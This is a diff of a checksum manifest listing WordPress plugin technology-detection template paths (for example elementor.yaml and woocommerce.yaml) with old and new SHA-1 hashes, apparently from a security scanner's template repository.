+http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:1dee9b0499d6f09cd1496012cf5fc07a63cb29a4 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:48501b4ad5791d5be6f43de4154d2a7b5b297222 -http/technologies/wordpress/plugins/elementor.yaml:81bbe93a3d943f541b5b48cbaa1a6b17dd47a15a -http/technologies/wordpress/plugins/elementskit-lite.yaml:6eaec8609da369c527e2cffbd5c3ebae5a1b6056 -http/technologies/wordpress/plugins/enable-media-replace.yaml:88003404364d2fba3e3f8ac6204716f1938da2a5 -http/technologies/wordpress/plugins/envato-elements.yaml:fe5dcc0e62be41897fa477dff96d46c3d561a4cb -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:19d532028277725d9eb60577c11a6e70a8fe7b1c -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:2f9842f458ff94a6629fce816f8ef72fae33c078 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:2a86b22e62ca6dc6dbc9d9177a55af57af5435d7 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:b336be2cc157aa2ee2ddd7b9ae60af58dea4996d -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:dececf57068579eb7b2805a0da83833f76cd6e22 -http/technologies/wordpress/plugins/flamingo.yaml:8c80e0eda3ab11d07175e7948dd43128c72f04d3 -http/technologies/wordpress/plugins/fluentform.yaml:f65e7cea8dab63833119a4d124113de87df5051a -http/technologies/wordpress/plugins/font-awesome.yaml:bb603c578389af2ae91e10cca46be9949840d3c7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:1334881683cdf2ed67206661390607974ec94ff7 -http/technologies/wordpress/plugins/formidable.yaml:f58b6e70ad8632939b9e16f880a50952f8bc26bb -http/technologies/wordpress/plugins/forminator.yaml:549e094041573007ee576bd38e6c910b19f6d2be -http/technologies/wordpress/plugins/ga-google-analytics.yaml:bcc972d3c60b494c706d6796e032b823df9667aa -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:d6ce008b5ee28d3081b6ab5d779278b9aac61c4c -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:1177d37aa27f348f67d08d8f90287a6c71dc7e26 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:28f3cadf83379046909c3048ad1053a70363e474 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:b5a08cbaf69b25598f4b75f5c7f17dad75f5294f -http/technologies/wordpress/plugins/google-site-kit.yaml:44e9c997e923b211e496a416f079e27cfc1c0031 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:4826d0e0d274bad8a846152c059ab43d5e7495e4 -http/technologies/wordpress/plugins/gtranslate.yaml:7aae8803e91182d75ca3ff760168186e8ee2a1ce -http/technologies/wordpress/plugins/gutenberg.yaml:6faf4f11cc90254da1fb2c68b84b747db1a84dd1 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:160dd2f3947f963e7ca194f20ed7b275bef94321 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5a633d727fe71e2dd3a1ff28db0797e8d4c045fc -http/technologies/wordpress/plugins/header-footer-elementor.yaml:a0a01c35436def3de3bc40c34e54ee826623798d -http/technologies/wordpress/plugins/header-footer.yaml:c5cf03baf5617e23fa376496e0b4822922462c10 -http/technologies/wordpress/plugins/health-check.yaml:2c4ab4580f61a587d22f6a0c8028ba0395e55d1c -http/technologies/wordpress/plugins/hello-dolly.yaml:267b036646e890a7ec8e2570051ca63d0fc2f659 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:086d78952d9864b0867ba700960204432f55dcee -http/technologies/wordpress/plugins/hostinger.yaml:2bbee2cc11eb933dd630c4fb9b9acfdbde8260bd -http/technologies/wordpress/plugins/image-optimization.yaml:4d511f137d4641856c8b7a47b09e86fe0c78a3fe -http/technologies/wordpress/plugins/imagify.yaml:3961271a05f9cac97e8b0e4ce394de3186e77d2e -http/technologies/wordpress/plugins/imsanity.yaml:6b7fa9f0f14022f1fe33cabcce1ceba5849b8bf9 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:1ecb07f17eaac49785a5f49396b5d66ca0f05451 -http/technologies/wordpress/plugins/instagram-feed.yaml:9edb115c9e29a3371fb69b938459c4584c406284 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:791c3f093ddf102f728a4043510f32f0bdd9d756 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:6a2480bd871368d24c53644402033582ce37955b -http/technologies/wordpress/plugins/jetpack.yaml:fe11582bd4607a6d1fb909a708e7569cee672d5a -http/technologies/wordpress/plugins/kadence-blocks.yaml:c8152772a15e56ed7011070cfd2f96d31b3e3bc8 -http/technologies/wordpress/plugins/kirki.yaml:b23551751c1ad2933f62bfffa479e4aacfb650be -http/technologies/wordpress/plugins/leadin.yaml:552f4f3d1eaa7a19e02620f0eaf736aa3d914ac9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:1b9b2e2e8a6489c977cbd8fa6efbf91769ae2736 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7644511689094e13b7c5ce42026c70703a2c697f -http/technologies/wordpress/plugins/litespeed-cache.yaml:d1ca4d337eb67fb74eced85c27df4683350f4f8f -http/technologies/wordpress/plugins/loco-translate.yaml:5f88526c1da3e941995dc91a6aecf04fd5f30e0b -http/technologies/wordpress/plugins/loginizer.yaml:edd2e0e824924e5ae86d21d8081e7764e3e77746 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:25da9a0a68fb2753a886aa8fd21db6b640752ca6 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:05b1dfb65e567c2c1f0cbeb3e774c4b456524dbd -http/technologies/wordpress/plugins/mailpoet.yaml:8f9546e807f7d2cabdeff46d265b431fe0029376 -http/technologies/wordpress/plugins/maintenance.yaml:a603d9d3ebd33fa855e224fb41bdfbd597b54954 -http/technologies/wordpress/plugins/mainwp-child.yaml:57912d0b1d2dd1adb60743308f8742665f0f56cf -http/technologies/wordpress/plugins/malcare-security.yaml:86d14d7b9ab89fb269794008f88a8d48af02d3e4 -http/technologies/wordpress/plugins/megamenu.yaml:3b2ee1de799560451d4915bbb5f94981b7e4ace0 -http/technologies/wordpress/plugins/members.yaml:0e17fdede2156c50095779ff904a7a698e784f0d -http/technologies/wordpress/plugins/meta-box.yaml:9d5912c0524630c581534307d234ca40aa0efc33 -http/technologies/wordpress/plugins/metform.yaml:517e69662e3b67e90ca24113f2804a985cb3a34b -http/technologies/wordpress/plugins/ml-slider.yaml:17e4d02a87e8032cf5853979fdf5d597d6798387 -http/technologies/wordpress/plugins/newsletter.yaml:973300fcaba8b4cede67dade58d1e65a732daa6b -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:1bd7dcc7f3f5eef95d50d5f4a61ce241ecd5796d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:971e28a70dc44addb4e8cd0c3b399d1b39a50b98 -http/technologies/wordpress/plugins/ninja-forms.yaml:52112fa26fc7dd23c1820b83c2377a7c366ed855 -http/technologies/wordpress/plugins/ocean-extra.yaml:2e2e81dd68c5ea44175280e5f095c1b4591869a2 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:a2a03fcd4d09baccdcd7a122ecaad57c96d2b133 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2c8e8d97341c72dbafd70cbff01ceda6a0511baa -http/technologies/wordpress/plugins/optinmonster.yaml:3df3af3c14bd562a87953b0264d328f1e0ea3258 -http/technologies/wordpress/plugins/otter-blocks.yaml:cb5593f11156d06ac88b2250626d0fad2f773379 -http/technologies/wordpress/plugins/password-protected.yaml:5758777801a82bbd25f6cb094d48c843ddd7c793 -http/technologies/wordpress/plugins/pdf-embedder.yaml:1180732842479e550cab098c62102844ba5d6888 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:cd323f5684cd4a2e475749245d874d2868d66635 -http/technologies/wordpress/plugins/pixelyoursite.yaml:43e98c17986cb83f559a7b66b14d8f0e1ea995cb -http/technologies/wordpress/plugins/polylang.yaml:201c677d7775ae157e7088e8131450c8e72b316d +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:a119f43cbbd770a907ee7d2ad13011efce567555 -http/technologies/wordpress/plugins/post-smtp.yaml:dc895cb358a618f61e6834e99accdacc0844dcf5 -http/technologies/wordpress/plugins/post-types-order.yaml:7e3540bf816be4d048425c2fb01ff8e8714dab84 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c33ee34e23755ff20142ea49d583df7bc2f41c12 -http/technologies/wordpress/plugins/pretty-link.yaml:db30c7c036bb817ae8ce52bf9b3229948c1a7b1d -http/technologies/wordpress/plugins/really-simple-captcha.yaml:bc6c037badbe4128a8af6a211802e8f2ef2ceeec -http/technologies/wordpress/plugins/really-simple-ssl.yaml:035cadd420db41c138096b3b87a4349ee5c84cc1 -http/technologies/wordpress/plugins/redirection.yaml:b84a15b9bd0e8031d8901bf6a8d27178d52b3a3a -http/technologies/wordpress/plugins/redux-framework.yaml:a2715ebf2eeb42ac3fb873165efdcdb69e9ebdaf -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:aeb3f3290068227522abc6f02fec08cb256f2d9d -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:c295f04b494da43cd70233731a23e12561670465 -http/technologies/wordpress/plugins/safe-svg.yaml:6146907e0b916d2efa0d5d67fd862b370bc76c55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:99cee49480e21b048345cd7491ef4e3fbb7f1800 -http/technologies/wordpress/plugins/sg-cachepress.yaml:7b6836ae292b3fd29a3bea109a800aa5dc5db58d -http/technologies/wordpress/plugins/sg-security.yaml:236383cdf89abd2a1c762a6c012781ac80bcb1d3 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a9d5065147a17e49babd54ffc5f4ebaffb433c69 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:7d4994ffb30b3a738179033432391284c5f79b97 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:167ceb2c0a42f1d2719ec0fa185b8bdfa837ceff -http/technologies/wordpress/plugins/simple-history.yaml:57491475d8dda459c6c85e6c3a5daaa57c7c1996 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:95e58823cc6b51c85961fbbc884a624b83e416af -http/technologies/wordpress/plugins/siteorigin-panels.yaml:9b7fe6f885fefb92f9a62f3dbd037def8ee50bd5 -http/technologies/wordpress/plugins/smart-slider-3.yaml:451faad7065dd729fe0cd2bfbbd3ac3f94ef7035 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:2b25fda84a6fec16553940676c815d4c488ff8e6 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:bc8097b9d9235eebe55ef173705f464f0bfda5f9 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:7f377a37a5cd60376685cc4f197088fba64010e6 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:3e5df8bafbc47c597cb02ce100adee49f936bb99 -http/technologies/wordpress/plugins/svg-support.yaml:31b1bbd478901818b88e831e015ffe69ba1deca1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:1119b6000394943ae8a1d017dc3c327cf09a210c -http/technologies/wordpress/plugins/tablepress.yaml:7aeb03b7055b4511c7d61e0f34851b0afafec4cc -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:44b2c2a7e6e78e9407eba0a052c4bd526b00e8c3 -http/technologies/wordpress/plugins/templately.yaml:5fa23438d9a5d3e5843076dff3d85bb0464d8cfb -http/technologies/wordpress/plugins/the-events-calendar.yaml:a5a33addc25cc9965f99b6699a7b80b24b22d3c7 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:f7e1c1edb4e7353e6fac96fb8c87fdf1bdb66fb9 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:8c87e9fffcebf5f04645f46033dbb7bed21522b3 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:a87e7e8277478e7505eb436685ca87c0ce130872 -http/technologies/wordpress/plugins/under-construction-page.yaml:52121a50514aaaf7d7a59ce926f54aa10cf15ba3 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:edcd863200181bd414befba2b1761eb3e2fd9534 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:49fd50c927e45ae27da74152958884a1103e653d +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:5dd3991dcd1cda648cb5b06ba23e4dc161d19ef7 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:98f9af30cc234e4c7b4b5bf22f6bbaa53cbe6f5f -http/technologies/wordpress/plugins/webp-express.yaml:40e469d6a202f0160ef83d275eb6623eea3a9d3c -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:719ab84147c10169bb49944409fb7d82d00b0c4d -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:c4fb3e070c29d4a21a0670a6e9b44b838c7c3391 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:865f9552ce696e2f57cacfbff5639eebec2b7693 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:0a37f42407331ea5d7ca9d524490522c195469e6 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:67e91a90004596978ab908106f2d82ad74bf50ca -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:c7f5487278701e4fc7714f159a8618d2a1e762b2 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:ddf2a1c90df35fbbe5829da6863d0611fc266cb5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:99bf699064a6e29385722ebe2ff3f8ebb5005ac6 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e4ad8d7b99eb0b0ce3e6fa1fd617b2b13cbe3b4a -http/technologies/wordpress/plugins/woocommerce-services.yaml:ccd6f7e89bea7ca67d5af5b24fead3c4926501d8 -http/technologies/wordpress/plugins/woocommerce.yaml:23253c686c07d1d1a445e7a68d6734232fd4f155 